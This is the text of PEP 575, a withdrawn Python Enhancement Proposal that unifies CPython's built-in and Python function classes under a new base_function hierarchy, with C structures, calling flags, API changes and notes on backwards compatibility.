defined_function versus function
Scope of this PEP: which classes are involved?
Not treating METH_STATIC and METH_CLASS
__self__ in base_function
Two implementations of __doc__
Subclassing
Replacing tp_call: METH_PASS_FUNCTION and METH_CALL_UNBOUND
Backwards compatibility
Changes to types and inspect
Python functions
Built-in functions of a module
Built-in bound and unbound methods
New attributes
method_descriptor and PyDescr_NewMethod
Two-phase Implementation
Phase one: keep existing classes but add base classes
Phase two
Reference Implementation
Appendix: current situation
builtin_function_or_method: built-in functions and bound methods
method_descriptor: built-in unbound methods
function: Python functions
method: Python bound methods
References
Copyright
Withdrawal notice
See PEP 580 for a better solution to allowing fast calling of custom classes.
See PEP 579 for a broader discussion of some of the other issues from this PEP.
Abstract
Reorganize the class hierarchy for functions and methods
with the goal of reducing the difference between
built-in functions (implemented in C) and Python functions.
Mainly, make built-in functions behave more like Python functions
without sacrificing performance.
A new base class base_function is introduced and the various function
classes, as well as method (renamed to bound_method), inherit from it.
We also allow subclassing the Python function class.
Motivation
Currently, CPython has two different function classes:
the first is Python functions, which is what you get
when defining a function with def or lambda.
The second is built-in functions such as len, isinstance or numpy.dot.
These are implemented in C.
These two classes are implemented completely independently and have different functionality.
In particular, it is currently not possible to implement a function efficiently in C
(only built-in functions can do that)
while still allowing introspection like inspect.signature or inspect.getsourcefile
(only Python functions can do that).
This is a problem for projects like Cython [1] that want to do exactly that.
In Cython, this was worked around by inventing a new function class called cyfunction.
Unfortunately, a new function class creates problems:
the inspect module does not recognize such functions as being functions [2]
and the performance is worse
(CPython has specific optimizations for calling built-in functions).
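As a small illustration of this asymmetry on current CPython (existing standard-library behaviour, not new API from this PEP):
import inspect

def py_func(x):
    return x

print(inspect.isfunction(py_func))  # True
print(inspect.isfunction(len))      # False: built-ins fail this check
print(inspect.isbuiltin(len))       # True
# inspect.getsourcefile(len) raises TypeError because len is
# implemented in C.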
A second motivation is more generally making built-in functions and methods
behave more like Python functions and methods.
For example, Python unbound methods are just functions but
unbound methods of extension types (e.g. dict.get) are a distinct class.
Bound methods of Python classes have a __func__ attribute,
bound methods of extension types do not.
Third, this PEP allows great customization of functions.
The function class becomes subclassable and custom function
subclasses are also allowed for functions implemented in C.
In the latter case, this can be done with the same performance
as true built-in functions.
All functions can access the function object
(the self in __call__), paving the way for PEP 573.
New classes
This is the new class hierarchy for functions and methods:
              object
                 |
                 |
           base_function
          /      |      \
         /       |       \
        /        |   defined_function
       /         |         \
cfunction (*)    |          \
                 |       function
                 |
          bound_method (*)
The two classes marked with (*) do not allow subclassing;
the others do.
There is no difference between functions and unbound methods,
while bound methods are instances of bound_method.
base_function
The class base_function becomes a new base class for all function types.
It is based on the existing builtin_function_or_method class,
but with the following differences and new features:
It acts as a descriptor implementing __get__ to turn a function into a method
if m_self is NULL.
If m_self is not NULL,
then this is a no-op: the existing function is returned instead.
A new read-only attribute __parent__, represented in the C structure as m_parent.
If this attribute exists, it represents the defining object.
For methods of extension types, this is the defining class (__class__ in plain Python)
and for functions of a module, this is the defining module.
In general, it can be any Python object.
If __parent__ is a class, it carries special semantics:
in that case, the function must be called with self being an instance of that class.
Finally, __qualname__ and __reduce__ will use __parent__
as namespace (instead of __self__ before).
A new attribute __objclass__ which equals __parent__ if __parent__
is a class. Otherwise, accessing __objclass__ raises AttributeError.
This is meant to be backwards compatible with method_descriptor.
The field ml_doc and the attributes __doc__ and
__text_signature__ (see Argument Clinic)
are not supported.
A new flag METH_PASS_FUNCTION for ml_flags.
If this flag is set, the C function stored in ml_meth is called with
an additional first argument equal to the function object.
A new flag METH_BINDING for ml_flags which only applies to
functions of a module (not methods of a class).
If this flag is set, then m_self is set to NULL instead
of the module.
This allows the function to behave more like a Python function
as it enables __get__.
A new flag METH_CALL_UNBOUND to disable self slicing.
A new flag METH_PYTHON for ml_flags.
This flag indicates that this function should be treated as a Python function.
Ideally, use of this flag should be avoided because it goes
against the duck typing philosophy.
It is still needed in a few places though, for example profiling.
The goal of base_function is that it supports all different ways
of calling functions and methods in just one structure.
For example, the new flag METH_PASS_FUNCTION
will be used by the implementation of methods.
It is not possible to directly create instances of base_function
(tp_new is NULL).
However, it is legal for C code to manually create instances.
These are the relevant C structures:
PyTypeObject PyBaseFunction_Type;
typedef struct {
PyObject_HEAD
PyCFunctionDef *m_ml; /* Description of the C function to call */
PyObject *m_self; /* __self__: anything, can be NULL; readonly */
PyObject *m_module; /* __module__: anything (typically str) */
PyObject *m_parent; /* __parent__: anything, can be NULL; readonly */
PyObject *m_weakreflist; /* List of weak references */
} PyBaseFunctionObject;
typedef struct {
const char *ml_name; /* The name of the built-in function/method */
PyCFunction ml_meth; /* The C function that implements it */
int ml_flags; /* Combination of METH_xxx flags, which mostly
describe the args expected by the C func */
} PyCFunctionDef;
Subclasses may extend PyCFunctionDef with extra fields.
The Python attribute __self__ returns m_self,
except if METH_STATIC is set.
In that case or if m_self is NULL,
then there is no __self__ attribute at all.
For that reason, we write either m_self or __self__ in this PEP
with slightly different meanings.
cfunction
This is the new version of the old builtin_function_or_method class.
The name cfunction was chosen to avoid confusion with “built-in”
in the sense of “something in the builtins module”.
It also fits better with the C API, which uses the PyCFunction prefix.
The class cfunction is a copy of base_function, with the following differences:
m_ml points to a PyMethodDef structure,
extending PyCFunctionDef with an additional ml_doc
field to implement __doc__ and __text_signature__
as read-only attributes:
typedef struct {
    const char *ml_name;
    PyCFunction ml_meth;
    int ml_flags;
    const char *ml_doc;
} PyMethodDef;
Note that PyMethodDef is part of the Python Stable ABI
and it is used by practically all extension modules,
so we absolutely cannot change this structure.
Argument Clinic is supported.
__self__ always exists. In the cases where base_function.__self__
would raise AttributeError, instead None is returned.
The type object is PyTypeObject PyCFunction_Type
and we define PyCFunctionObject as alias of PyBaseFunctionObject
(except for the type of m_ml).
defined_function
The class defined_function is an abstract base class meant
to indicate that the function has introspection support.
Instances of defined_function are required to support all attributes
that Python functions have, namely
__code__, __globals__, __doc__,
__defaults__, __kwdefaults__, __closure__ and __annotations__.
There is also a __dict__ to support attributes added by the user.
None of these is required to be meaningful.
In particular, __code__ may not be a working code object,
possibly only a few fields may be filled in.
This PEP does not dictate how the various attributes are implemented.
They may be simple struct members or more complicated descriptors.
Only read-only support is required, none of the attributes is required to be writable.
The class defined_function is mainly meant for auto-generated C code,
for example produced by Cython [1].
There is no API to create instances of it.
The C structure is the following:
PyTypeObject PyDefinedFunction_Type;
typedef struct {
PyBaseFunctionObject base;
PyObject *func_dict; /* __dict__: dict or NULL */
} PyDefinedFunctionObject;
TODO: maybe find a better name for defined_function.
Other proposals: inspect_function (anything that satisfies inspect.isfunction),
builtout_function (a function that is better built out; pun on builtin),
generic_function (original proposal but conflicts with functools.singledispatch generic functions),
user_function (defined by the user as opposed to CPython).
function
This is the class meant for functions implemented in Python.
Unlike the other function types,
instances of function can be created from Python code.
This is not changed, so we do not describe the details in this PEP.
The layout of the C structure is the following:
PyTypeObject PyFunction_Type;
typedef struct {
PyBaseFunctionObject base;
PyObject *func_dict; /* __dict__: dict or NULL */
PyObject *func_code; /* __code__: code */
PyObject *func_globals; /* __globals__: dict; readonly */
PyObject *func_name; /* __name__: string */
PyObject *func_qualname; /* __qualname__: string */
PyObject *func_doc; /* __doc__: can be anything or NULL */
PyObject *func_defaults; /* __defaults__: tuple or NULL */
PyObject *func_kwdefaults; /* __kwdefaults__: dict or NULL */
PyObject *func_closure; /* __closure__: tuple of cell objects or NULL; readonly */
PyObject *func_annotations; /* __annotations__: dict or NULL */
PyCFunctionDef _ml; /* Storage for base.m_ml */
} PyFunctionObject;
The descriptor __name__ returns func_name.
When setting __name__, base.m_ml->ml_name is also updated
with the UTF-8 encoded name.
The _ml field reserves space to be used by base.m_ml.
A base_function instance must have the flag METH_PYTHON set
if and only if it is an instance of function.
When constructing an instance of function from code and globals,
an instance is created with base.m_ml = &_ml,
base.m_self = NULL.
To make subclassing easier, we also add a copy constructor:
if f is an instance of function, then types.FunctionType(f) copies f.
This conveniently allows using a custom function type as decorator:
>>> from types import FunctionType
>>> class CustomFunction(FunctionType):
...     pass
>>> @CustomFunction
... def f(x):
...     return x
>>> type(f)
<class '__main__.CustomFunction'>
This also removes many use cases of functools.wraps:
wrappers can be replaced by subclasses of function.
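For comparison, this is the conventional functools.wraps pattern that such subclasses could replace (plain current-Python code, shown only to contrast with the decorator example above; the decorator name logged is invented here):
import functools

def logged(func):
    # Metadata such as __name__ and __doc__ must be copied onto the
    # wrapper explicitly, which is what functools.wraps does.
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        print("calling", func.__name__)
        return func(*args, **kwargs)
    return wrapper

@logged
def add(x, y):
    return x + y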
bound_method
The class bound_method is used for all bound methods,
regardless of the class of the underlying function.
It adds one new attribute on top of base_function:
__func__ points to that function.
bound_method replaces the old method class
which was used only for Python functions bound as method.
There is a complication because we want to allow
constructing a method from an arbitrary callable.
This may be an already-bound method or simply not an instance of base_function.
Therefore, in practice there are two kinds of methods:
For arbitrary callables, we use a single fixed PyCFunctionDef
structure with the METH_PASS_FUNCTION flag set.
For methods which bind instances of base_function
(more precisely, which have the Py_TPFLAGS_BASEFUNCTION flag set)
that have self slicing,
we instead use the PyCFunctionDef from the original function.
This way, we don’t lose any performance when calling bound methods.
In this case, the __func__ attribute is only used to implement
various attributes but not for calling the method.
When constructing a new method from a base_function,
we check that the self object is an instance of __objclass__
(if a class was specified as parent) and raise a TypeError otherwise.
The C structure is:
PyTypeObject PyMethod_Type;
typedef struct {
PyBaseFunctionObject base;
PyObject *im_func; /* __func__: function implementing the method; readonly */
} PyMethodObject;
Calling base_function instances
We specify the implementation of __call__ for instances of base_function.
Checking __objclass__
First of all, a type check is done if the __parent__ of the function
is a class
(recall that __objclass__ then becomes an alias of __parent__):
if m_self is NULL (this is the case for unbound methods of extension types),
then the function must be called with at least one positional argument
and the first (typically called self) must be an instance of __objclass__.
If not, a TypeError is raised.
Note that bound methods have m_self != NULL, so the __objclass__
is not checked.
Instead, the __objclass__ check is done when constructing the method.
Flags
For convenience, we define a new constant:
METH_CALLFLAGS combines all flags from PyCFunctionDef.ml_flags
which specify the signature of the C function to be called.
It is equal to
METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_PASS_FUNCTION
Exactly one of the first four flags above must be set
and only METH_VARARGS and METH_FASTCALL may be combined with METH_KEYWORDS.
Violating these rules is undefined behaviour.
There are two new flags which affect calling functions,
namely METH_PASS_FUNCTION and METH_CALL_UNBOUND.
Some flags are already documented in [5].
We explain the others below.
Self slicing
If the function has m_self == NULL and the flag METH_CALL_UNBOUND
is not set, then the first positional argument (if any)
is removed from *args and instead passed as first argument to the C function.
Effectively, the first positional argument is treated as __self__.
This is meant to support unbound methods
such that the C function does not see the difference
between bound and unbound method calls.
This does not affect keyword arguments in any way.
This process is called self slicing and a function is said to
have self slicing if m_self == NULL and METH_CALL_UNBOUND is not set.
Note that a METH_NOARGS function which has self slicing
effectively has one argument, namely self.
Analogously, a METH_O function with self slicing has two arguments.
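At the Python level, self slicing models the behaviour that unbound methods of extension types already show today (current-CPython behaviour, shown for illustration only):
d = {"answer": 42}

# Bound call: self comes from the method object itself.
print(d.get("answer"))        # 42

# Unbound call: the first positional argument is treated as self,
# which is exactly what self slicing describes at the C level.
print(dict.get(d, "answer"))  # 42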
METH_PASS_FUNCTION
If this flag is set, then the C function is called with an
additional first argument, namely the function itself
(the base_function instance).
As special case, if the function is a bound_method,
then the underlying function of the method is passed
(but not recursively: if a bound_method wraps a bound_method,
then __func__ is only applied once).
For example, an ordinary METH_VARARGS function has signature
(PyObject *self, PyObject *args).
With METH_VARARGS | METH_PASS_FUNCTION, this becomes
(PyObject *func, PyObject *self, PyObject *args).
METH_FASTCALL
This is an existing but undocumented flag.
We suggest to officially support and document it.
If the flag METH_FASTCALL is set without METH_KEYWORDS,
then the ml_meth field is of type PyCFunctionFast
which takes the arguments (PyObject *self, PyObject *const *args, Py_ssize_t nargs).
Such a function takes only positional arguments and they are passed as plain C array
args of length nargs.
If the flags METH_FASTCALL | METH_KEYWORDS are set,
then the ml_meth field is of type PyCFunctionFastKeywords
which takes the arguments (PyObject *self, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames).
The positional arguments are passed as C array args of length nargs.
The values of the keyword arguments follow in that array,
starting at position nargs.
The keys (names) of the keyword arguments are passed as a tuple in kwnames.
As an example, assume that 3 positional and 2 keyword arguments are given.
Then args is an array of length 3 + 2 = 5, nargs equals 3 and kwnames is a 2-tuple.
Automatic creation of built-in functions
Python automatically generates instances of cfunction
for extension types (using the PyTypeObject.tp_methods field) and modules
(using the PyModuleDef.m_methods field).
The arrays PyTypeObject.tp_methods and PyModuleDef.m_methods
must be arrays of PyMethodDef structures.
Unbound methods of extension types
The type of unbound methods changes from method_descriptor
to cfunction.
The object which appears as unbound method is the same object which
appears in the class __dict__.
Python automatically sets the __parent__ attribute to the defining class.
Built-in functions of a module
For the case of functions of a module,
__parent__ will be set to the module.
Unless the flag METH_BINDING is given, also __self__
will be set to the module (for backwards compatibility).
An important consequence is that such functions by default
do not become methods when used as attribute
(base_function.__get__ only does that if m_self was NULL).
One could consider this a bug, but this was done for backwards compatibility reasons:
in an initial post on python-ideas [6] the consensus was to keep this
misfeature of built-in functions.
However, to allow this anyway for specific or newly implemented
built-in functions, the METH_BINDING flag prevents setting __self__.
Further changes
New type flag
A new PyTypeObject flag (for tp_flags) is added:
Py_TPFLAGS_BASEFUNCTION to indicate that instances of this type are
functions which can be called and bound as method like a base_function.
This is different from flags like Py_TPFLAGS_LIST_SUBCLASS
because it indicates more than just a subclass:
it also indicates a default implementation of __call__ and __get__.
In particular, such subclasses of base_function
must follow the implementation from the section Calling base_function instances.
This flag is automatically set for extension types which
inherit the tp_call and tp_descr_get implementation from base_function.
Extension types can explicitly specify it if they
override __call__ or __get__ in a compatible way.
The flag Py_TPFLAGS_BASEFUNCTION must never be set for a heap type
because that would not be safe (heap types can be changed dynamically).
C API functions
We list some relevant Python/C API macros and functions.
Some of these are existing (possibly changed) functions, some are new:
int PyBaseFunction_CheckFast(PyObject *op): return true if op
is an instance of a class with the Py_TPFLAGS_BASEFUNCTION set.
This is the function that you need to use to determine
whether it is meaningful to access the base_function internals.
int PyBaseFunction_Check(PyObject *op): return true if op
is an instance of base_function.
PyObject *PyBaseFunction_New(PyTypeObject *cls, PyCFunctionDef *ml, PyObject *self, PyObject *module, PyObject *parent):
create a new instance of cls (which must be a subclass of base_function)
from the given data.
int PyCFunction_Check(PyObject *op): return true if op
is an instance of cfunction.
PyObject *PyCFunction_NewEx(PyMethodDef* ml, PyObject *self, PyObject* module):
create a new instance of cfunction.
As special case, if self is NULL,
then set self = Py_None instead (for backwards compatibility).
If self is a module, then __parent__ is set to self.
Otherwise, __parent__ is NULL.
For many existing PyCFunction_... and PyMethod_ functions,
we define a new function PyBaseFunction_...
acting on base_function instances.
The old functions are kept as aliases of the new functions.
int PyFunction_Check(PyObject *op): return true if op
is an instance of base_function with the METH_PYTHON flag set
(this is equivalent to checking whether op is an instance of function).
int PyFunction_CheckFast(PyObject *op): equivalent to
PyFunction_Check(op) && PyBaseFunction_CheckFast(op).
int PyFunction_CheckExact(PyObject *op): return true
if the type of op is function.
PyObject *PyFunction_NewPython(PyTypeObject *cls, PyObject *code, PyObject *globals, PyObject *name, PyObject *qualname):
create a new instance of cls (which must be a subclass of function)
from the given data.
PyObject *PyFunction_New(PyObject *code, PyObject *globals):
create a new instance of function.
PyObject *PyFunction_NewWithQualName(PyObject *code, PyObject *globals, PyObject *qualname):
create a new instance of function.
PyObject *PyFunction_Copy(PyTypeObject *cls, PyObject *func):
create a new instance of cls (which must be a subclass of function)
by copying a given function.
Changes to the types module
Two types are added: types.BaseFunctionType corresponding to
base_function and types.DefinedFunctionType corresponding to
defined_function.
Apart from that, no changes to the types module are made.
In particular, types.FunctionType refers to function.
However, the actual types will change:
in particular, types.BuiltinFunctionType will no longer be the same
as types.BuiltinMethodType.
Changes to the inspect module
The new function inspect.isbasefunction checks for an instance of base_function.
inspect.isfunction checks for an instance of defined_function.
inspect.isbuiltin checks for an instance of cfunction.
inspect.isroutine checks isbasefunction or ismethoddescriptor.
NOTE: bpo-33261 [3] should be fixed first.
Profiling
Currently, sys.setprofile supports c_call, c_return and c_exception
events for built-in functions.
These events are generated when calling or returning from a built-in function.
By contrast, the call and return events are generated by the function itself.
So nothing needs to change for the call and return events.
Since we no longer make a difference between C functions and Python functions,
we need to prevent the c_* events for Python functions.
This is done by not generating those events if the
METH_PYTHON flag in ml_flags is set.
Non-CPython implementations
Most of this PEP is only relevant to CPython.
For other implementations of Python,
the two changes that are required are the base_function base class
and the fact that function can be subclassed.
The classes cfunction and defined_function are not required.
We require base_function for consistency but we put no requirements on it:
it is acceptable if this is just a copy of object.
Support for the new __parent__ (and __objclass__) attribute is not required.
If there is no defined_function class,
then types.DefinedFunctionType should be an alias of types.FunctionType.
Rationale
Why not simply change existing classes?
One could try to solve the problem by keeping the existing classes
without introducing a new base_function class.
That might look like a simpler solution but it is not:
it would require introspection support for 3 distinct classes:
function, builtin_function_or_method and method_descriptor.
For the latter two classes, “introspection support” would mean
at a minimum allowing subclassing.
But we don’t want to lose performance, so we want fast subclass checks.
This would require two new flags in tp_flags.
And we want subclasses to allow __get__ for built-in functions,
so we should implement the LOAD_METHOD opcode for built-in functions too.
More generally, a lot of functionality would need to be duplicated
and the end result would be far more complex code.
It is also not clear how the introspection of built-in function subclasses
would interact with __text_signature__.
Having two independent kinds of inspect.signature support on the same
class sounds like asking for problems.
And this would not fix some of the other differences between built-in functions
and Python functions that were mentioned in the motivation.
Why __text_signature__ is not a solution
Built-in functions have an attribute __text_signature__,
which gives the signature of the function as plain text.
The default values are evaluated by ast.literal_eval.
Because of this, it supports only a small number of standard Python classes
and not arbitrary Python objects.
And even if __text_signature__ would allow arbitrary signatures somehow,
that is only one piece of introspection:
it does not help with inspect.getsourcefile for example.
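The literal-only restriction of ast.literal_eval can be seen directly; a small standard-library sketch (the rejected string is an arbitrary example chosen here):
import ast

# Literals of standard types are accepted.
print(ast.literal_eval("(1, 2.5, 'text', None)"))

# Arbitrary objects and expressions are rejected, so they cannot
# appear as default values in __text_signature__.
try:
    ast.literal_eval("collections.OrderedDict()")
except ValueError as exc:
    print("rejected:", exc)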
defined_function versus function
In many places, a decision needs to be made whether the old function class
should be replaced by defined_function or the new function class.
This is done by thinking of the most likely use case:
types.FunctionType refers to function because that
type might be used to construct instances using types.FunctionType(...).
inspect.isfunction() refers to defined_function
because this is the class where introspection is supported.
The C API functions must refer to function because
we do not specify how the various attributes of defined_function
are implemented.
We expect that this is not a problem since there is typically no
reason for introspection to be done by C extensions.
Scope of this PEP: which classes are involved?
The main motivation of this PEP is fixing function classes,
so we certainly want to unify the existing classes
builtin_function_or_method and function.
Since built-in functions and methods have the same class,
it seems natural to include bound methods too.
And since there are no “unbound methods” for Python functions,
it makes sense to get rid of unbound methods for extension types.
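The asymmetry referred to here is visible on current CPython (illustrative only):
class C:
    def method(self):
        pass

print(type(C.method))   # <class 'function'>: no separate unbound method class
print(type(dict.get))   # <class 'method_descriptor'>: a distinct class
print(type({}.get))     # <class 'builtin_function_or_method'>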
For now, no changes are made to the classes staticmethod,
classmethod and classmethod_descriptor.
It would certainly make sense to put these in the base_function
class hierarchy and unify classmethod and classmethod_descriptor.
However, this PEP is already big enough
and this is left as a possible future improvement.
Slot wrappers for extension types like __init__ or __eq__
are quite different from normal methods.
They are also typically not called directly because you would normally
write foo[i] instead of foo.__getitem__(i).
So these are left outside the scope of this PEP.
Python also has an instancemethod class,
which seems to be a relic from Python 2,
where it was used for bound and unbound methods.
It is not clear whether there is still a use case for it.
In any case, there is no reason to deal with it in this PEP.
TODO: should instancemethod be deprecated?
It doesn’t seem used at all within CPython 3.7,
but maybe external packages use it?
Not treating METH_STATIC and METH_CLASS
Almost nothing in this PEP refers to the flags METH_STATIC and METH_CLASS.
These flags are checked only by the automatic creation of built-in functions.
When a staticmethod, classmethod or classmethod_descriptor
is bound (i.e. __get__ is called),
a base_function instance is created with m_self != NULL.
For a classmethod, this is obvious since m_self
is the class that the method is bound to.
For a staticmethod, one can take an arbitrary Python object for m_self.
For backwards compatibility, we choose m_self = __parent__ for static methods
of extension types.
__self__ in base_function
It may look strange at first sight to add the __self__ slot
in base_function as opposed to bound_method.
We took this idea from the existing builtin_function_or_method class.
It allows us to have a single general implementation of __call__ and __get__
for the various function classes discussed in this PEP.
It also makes it easy to support existing built-in functions
which set __self__ to the module (for example, sys.exit.__self__ is sys).
Two implementations of __doc__
base_function does not support function docstrings.
Instead, the classes cfunction and function
each have their own way of dealing with docstrings
(and bound_method just takes the __doc__ from the wrapped function).
For cfunction, the docstring is stored (together with the text signature)
as C string in the read-only ml_doc field of a PyMethodDef.
For function, the docstring is stored as a writable Python object
and it does not actually need to be a string.
It looks hard to unify these two very different ways of dealing with __doc__.
For backwards compatibility, we keep the existing implementations.
For defined_function, we require __doc__ to be implemented
but we do not specify how. A subclass can implement __doc__ the
same way as cfunction or using a struct member or some other way.
Subclassing
We disallow subclassing of cfunction and bound_method
to enable fast type checks for PyCFunction_Check and PyMethod_Check.
We allow subclassing of the other classes because there is no reason to disallow it.
For Python modules, the only relevant class to subclass is
function because the others cannot be instantiated anyway.
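For reference, the existing built-in function class already refuses subclassing on current CPython (illustrative only):
try:
    class MyBuiltin(type(len)):  # builtin_function_or_method
        pass
except TypeError as exc:
    print("cannot subclass:", exc)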
Replacing tp_call: METH_PASS_FUNCTION and METH_CALL_UNBOUND
The new flags METH_PASS_FUNCTION and METH_CALL_UNBOUND
are meant to support cases where formerly a custom tp_call was used.
It reduces the number of special fast paths in Python/ceval.c
for calling objects:
instead of treating Python functions, built-in functions and method descriptors
separately, there would only be a single check.
The signature of tp_call is essentially the signature
of PyBaseFunctionObject.m_ml.ml_meth with flags
METH_VARARGS | METH_KEYWORDS | METH_PASS_FUNCTION | METH_CALL_UNBOUND
(the only difference is an added self argument).
Therefore, it should be easy to change existing tp_call slots
to use the base_function implementation instead.
It also makes sense to use METH_PASS_FUNCTION without METH_CALL_UNBOUND
in cases where the C function simply needs access to additional metadata
from the function, such as the __parent__.
This is for example needed to support PEP 573.
Converting existing methods to use METH_PASS_FUNCTION is trivial:
it only requires adding an extra argument to the C function.
Backwards compatibility
While designing this PEP, great care was taken to not break
backwards compatibility too much.
Most of the potentially incompatible changes
are changes to CPython implementation details
which are different anyway in other Python interpreters.
In particular, Python code which correctly runs on PyPy
will very likely continue to work with this PEP.
The standard classes and functions like
staticmethod, functools.partial or operator.methodcaller
do not need to change at all.
Changes to types and inspect
The proposed changes to types and inspect
are meant to minimize changes in behaviour.
However, it is unavoidable that some things change
and this can cause code which uses types or inspect to break.
In the Python standard library for example,
changes are needed in the doctest module because of this.
Also, tools which take various kinds of functions as input will need to deal
with the new function hierarchy and the possibility of custom
function classes.
Python functions
For Python functions, essentially nothing changes.
The attributes that existed before still exist and Python functions
can be initialized, called and turned into methods as before.
The name function is kept for backwards compatibility.
While it might make sense to change the name to something more
specific like python_function,
that would require a lot of annoying changes in documentation and testsuites.
Built-in functions of a module
Also for built-in functions, nothing changes.
We keep the old behaviour that such functions do not bind as methods.
This is a consequence of the fact that __self__ is set to the module.
Built-in bound and unbound methods
The types of built-in bound and unbound methods will change.
However, this does not affect calling such methods
because the protocol in base_function.__call__
(in particular the handling of __objclass__ and self slicing)
was specifically designed to be backwards compatible.
All attributes which existed before (like __objclass__ and __self__)
still exist.
New attributes
Some objects get new special double-underscore attributes.
For example, the new attribute __parent__ appears on
all built-in functions and all methods get a __func__ attribute.
The fact that __self__ is now a special read-only attribute
for Python functions caused trouble in [4].
Generally, we expect that not much will break though.
method_descriptor and PyDescr_NewMethod
The class method_descriptor and the constructor PyDescr_NewMethod
should be deprecated.
They are no longer used by CPython itself but are still supported.
Two-phase Implementation
TODO: this section is optional.
If this PEP is accepted, it should
be decided whether to apply this two-phase implementation or not.
As mentioned above, the changes to types and inspect can break some
existing code.
In order to further minimize breakage, this PEP could be implemented
in two phases.
Phase one: keep existing classes but add base classes
Initially, implement the base_function class
and use it as common base class but otherwise keep the existing classes
(but not their implementation).
In this proposal, the class hierarchy would become:
                object
                   |
                   |
             base_function
            /      |      \
           /       |       \
          /        |        \
   cfunction       |    defined_function
       |           |      |          \
       |           |  bound_method    \
       |           |                   \
       |   method_descriptor        function
       |
builtin_function_or_method
The leaf classes builtin_function_or_method, method_descriptor,
bound_method and function correspond to the existing classes
(with method renamed to bound_method).
Functions automatically created in modules become instances
of builtin_function_or_method.
Unbound methods of extension types become instances of method_descriptor.
The class method_descriptor is a copy of cfunction except
that __get__ returns a builtin_function_or_method instead of a
bound_method.
The class builtin_function_or_method has the same C structure as a
bound_method, but it inherits from cfunction.
The __func__ attribute is not mandatory:
it is only defined when binding a method_descriptor.
We keep the implementation of the inspect functions as they are.
Because of this and because the existing classes are kept,
backwards compatibility is ensured for code doing type checks.
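For instance, type-checking code of the following kind (a small sketch using today's public names from types and inspect, not part of the PEP itself) passes in current CPython and would keep passing under phase one, because the existing leaf classes remain:
import inspect
import types

def f():
    pass

# All of these hold in current CPython; keeping the existing leaf classes
# means such checks continue to succeed unchanged.
assert isinstance(len, types.BuiltinFunctionType)   # builtin_function_or_method
assert isinstance(f, types.FunctionType)
assert inspect.isbuiltin(len)
assert inspect.isfunction(f)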
Since showing an actual DeprecationWarning would affect a lot
of correctly-functioning code,
any deprecations would only appear in the documentation.
Another reason is that it is hard to show warnings for calling isinstance(x, t)
(but it could be done using __instancecheck__ hacking)
and impossible for type(x) is t.
Phase two
Phase two is what is actually described in the rest of this PEP.
In terms of implementation,
it would be a relatively small change compared to phase one.
Reference Implementation
Most of this PEP has been implemented for CPython at
https://github.com/jdemeyer/cpython/tree/pep575
There are four steps, corresponding to the commits on that branch.
After each step, CPython is in a mostly working state.
Add the base_function class and make it a base class of cfunction.
This is by far the biggest step as the complete __call__ protocol
is implemented in this step.
Rename method to bound_method and make it a subclass of base_function.
Change unbound methods of extension types to be instances of cfunction
such that bound methods of extension types are also instances of bound_method.
Implement defined_function and function.
Changes to other parts of Python, such as the standard library and testsuite.
Appendix: current situation
NOTE:
This section is more useful during the draft period of the PEP,
so feel free to remove this once the PEP has been accepted.
For reference, we describe in detail the relevant existing classes in CPython 3.7.
Each of the classes involved is an “orphan” class
(no non-trivial subclasses nor superclasses).
builtin_function_or_method: built-in functions and bound methods
These are of type PyCFunction_Type
with structure PyCFunctionObject:
typedef struct {
    PyObject_HEAD
    PyMethodDef *m_ml;          /* Description of the C function to call */
    PyObject *m_self;           /* Passed as 'self' arg to the C func, can be NULL */
    PyObject *m_module;         /* The __module__ attribute, can be anything */
    PyObject *m_weakreflist;    /* List of weak references */
} PyCFunctionObject;
struct PyMethodDef {
    const char *ml_name;    /* The name of the built-in function/method */
    PyCFunction ml_meth;    /* The C function that implements it */
    int ml_flags;           /* Combination of METH_xxx flags, which mostly
                               describe the args expected by the C func */
    const char *ml_doc;     /* The __doc__ attribute, or NULL */
};
where PyCFunction is a C function pointer (there are various forms of this, the most basic
takes two arguments for self and *args).
This class is used both for functions and bound methods:
for a method, the m_self slot points to the object:
>>> dict(foo=42).get
<built-in method get of dict object at 0x...>
>>> dict(foo=42).get.__self__
{'foo': 42}
In some cases, a function is considered a “method” of the module defining it:
>>> import os
>>> os.kill
<built-in function kill>
>>> os.kill.__self__
<module 'posix' (built-in)>
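One way to observe this distinction from Python code today (a small illustrative check, not part of the PEP):
import os
import types

# A built-in "function" of a module is really a method bound to that module:
assert isinstance(os.kill.__self__, types.ModuleType)
# whereas a genuine bound built-in method has the instance as its __self__:
assert dict(foo=42).get.__self__ == {'foo': 42}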
method_descriptor: built-in unbound methods
These are of type PyMethodDescr_Type
with structure PyMethodDescrObject:
typedef struct {
    PyDescrObject d_common;
    PyMethodDef *d_method;
} PyMethodDescrObject;
typedef struct {
    PyObject_HEAD
    PyTypeObject *d_type;
    PyObject *d_name;
    PyObject *d_qualname;
} PyDescrObject;
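These unbound methods can be observed and called directly from Python; for example (illustrative only, using current CPython behaviour):
# Unbound built-in methods are method_descriptor instances;
# binding one through an instance yields a builtin_function_or_method.
assert type(dict.get).__name__ == 'method_descriptor'
assert type({}.get).__name__ == 'builtin_function_or_method'
# The unbound form can still be called with the instance passed explicitly:
assert dict.get({'x': 1}, 'x') == 1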
function: Python functions
These are of type PyFunction_Type
with structure PyFunctionObject:
typedef struct {
    PyObject_HEAD
    PyObject *func_code;        /* A code object, the __code__ attribute */
    PyObject *func_globals;     /* A dictionary (other mappings won't do) */
    PyObject *func_defaults;    /* NULL or a tuple */
    PyObject *func_kwdefaults;  /* NULL or a dict */
    PyObject *func_closure;     /* NULL or a tuple of cell objects */
    PyObject *func_doc;         /* The __doc__ attribute, can be anything */
    PyObject *func_name;        /* The __name__ attribute, a string object */
    PyObject *func_dict;        /* The __dict__ attribute, a dict or NULL */
    PyObject *func_weakreflist; /* List of weak references */
    PyObject *func_module;      /* The __module__ attribute, can be anything */
    PyObject *func_annotations; /* Annotations, a dict or NULL */
    PyObject *func_qualname;    /* The qualified name */

    /* Invariant:
     *     func_closure contains the bindings for func_code->co_freevars, so
     *     PyTuple_Size(func_closure) == PyCode_GetNumFree(func_code)
     *     (func_closure may be NULL if PyCode_GetNumFree(func_code) == 0).
     */
} PyFunctionObject;
In Python 3, there is no “unbound method” class:
an unbound method is just a plain function.
method: Python bound methods
These are of type PyMethod_Type
with structure PyMethodObject:
typedef struct {
    PyObject_HEAD
    PyObject *im_func;        /* The callable object implementing the method */
    PyObject *im_self;        /* The instance it is bound to */
    PyObject *im_weakreflist; /* List of weak references */
} PyMethodObject;
